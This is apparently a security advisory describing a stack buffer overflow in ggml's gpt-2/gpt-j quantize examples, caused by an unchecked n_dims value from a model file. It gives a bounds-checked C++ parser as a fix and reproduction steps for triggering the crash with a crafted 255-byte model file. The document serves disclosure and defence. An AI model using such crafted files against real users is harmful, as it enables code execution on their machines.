# GGML common-ggml.cpp — Stack Buffer Overflow (CWE-121)

A crafted 255-byte model file causes a stack buffer overflow in `gpt-2-quantize` / `gpt-j-quantize` with attacker-controlled data, enabling potential code execution.

## Vulnerability

**File:** `examples/common-ggml.cpp:113-116` in `ggml_common_quantize_0()`

**Root Cause:** `n_dims` is read from the model file with no bounds check, then used to index `int32_t ne[4]`. Setting `n_dims > 4` writes attacker-controlled data past the 16-byte stack array.
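
A bounds-checked version of the read described under Root Cause, as an added example (not ggml's code and not the upstream fix). It assumes a simplified header of a little-endian `n_dims` followed by that many `int32_t` extents; `TensorShape`, `parse_shape` and `make_header` are hypothetical names. Beyond the `n_dims` check it also rejects truncated input, non-positive extents and element counts that overflow `int32_t`.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

constexpr int32_t kMaxDims = 4;  // capacity of the fixed array (`int32_t ne[4]`)

struct TensorShape {
    int32_t n_dims;
    int32_t ne[kMaxDims];
    int64_t n_elements;
};

// Read one little-endian int32 at *off; returns false on truncated input.
static bool read_i32(const std::vector<uint8_t>& buf, size_t* off, int32_t* out) {
    if (buf.size() - *off < 4) return false;  // *off never exceeds buf.size()
    uint32_t v = 0;
    for (int i = 0; i < 4; ++i) v |= static_cast<uint32_t>(buf[*off + i]) << (8 * i);
    *off += 4;
    *out = static_cast<int32_t>(v);
    return true;
}

// Parse the assumed header (n_dims, then n_dims extents) from untrusted bytes.
// *out is written only when every field validates.
bool parse_shape(const std::vector<uint8_t>& buf, TensorShape* out) {
    TensorShape s = {0, {1, 1, 1, 1}, 1};
    size_t off = 0;
    if (!read_i32(buf, &off, &s.n_dims)) return false;
    // The check missing from the vulnerable read: n_dims must fit the array.
    if (s.n_dims < 1 || s.n_dims > kMaxDims) return false;
    for (int32_t i = 0; i < s.n_dims; ++i) {
        if (!read_i32(buf, &off, &s.ne[i])) return false;
        if (s.ne[i] <= 0) return false;                        // nonsensical extent
        if (s.n_elements > INT32_MAX / s.ne[i]) return false;  // count would overflow int32
        s.n_elements *= s.ne[i];
    }
    *out = s;
    return true;
}

// Build constructed sample input: n_dims followed by the given extents.
std::vector<uint8_t> make_header(int32_t n_dims, const std::vector<int32_t>& extents) {
    std::vector<uint8_t> bytes;
    std::vector<int32_t> fields(extents);
    fields.insert(fields.begin(), n_dims);
    for (int32_t f : fields)
        for (int i = 0; i < 4; ++i)
            bytes.push_back(static_cast<uint8_t>(static_cast<uint32_t>(f) >> (8 * i)));
    return bytes;
}
```

With this shape of check, a header declaring `n_dims=32` is rejected before any extent is written into `ne`.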

## Reproduction

```bash
# Generate the malicious model file
python3 gen_stack_overflow_v2.py

# Build ggml with AddressSanitizer
git clone https://github.com/ggerganov/ggml && cd ggml
mkdir build && cd build
cmake .. -DCMAKE_BUILD_TYPE=Debug \
  -DCMAKE_CXX_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
  -DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address"
make -j4 gpt-2-quantize

# Trigger crash
./bin/gpt-2-quantize malicious_gpt2_v2.bin output.bin q4_0
# Result: Segmentation fault (without ASan) / ASan: stack-buffer-overflow (with ASan)
```

## Files

| File | Description |
|---|---|
| `malicious_gpt2_v2.bin` | 255-byte malicious GPT-2 model file (n_dims=32) |
| `gen_stack_overflow_v2.py` | Python generator script |

## Impact

Stack buffer overflow with attacker-controlled data. Overwrites saved registers, return address, and adjacent stack variables in `ggml_common_quantize_0()`. Potential for arbitrary code execution when a user quantizes a malicious model file.

## Tested Version

ggml 0.11.0 (commit ac6f7b44f60fde0091f0b3d99afde48f8c99b13a)